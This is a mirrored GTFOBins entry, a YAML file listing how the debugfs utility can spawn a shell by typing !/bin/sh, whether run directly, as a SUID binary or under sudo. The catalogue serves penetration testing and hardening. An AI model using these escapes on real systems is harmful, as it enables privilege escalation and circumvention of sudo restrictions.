mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
16 lines
192 B
Markdown
16 lines
192 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
debugfs
|
||
|
!/bin/sh
|
||
|
suid:
|
||
|
- code: |
|
||
|
./debugfs
|
||
|
!/bin/sh
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo debugfs
|
||
|
!/bin/sh
|
||
|
---
|